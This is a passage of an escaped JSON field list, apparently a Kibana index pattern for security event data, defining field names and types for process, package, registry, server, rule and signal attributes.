"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.command_line\"}}},{\"count\":0,\"name\":\"process.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.executable\"}}},{\"count\":0,\"name\":\"process.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0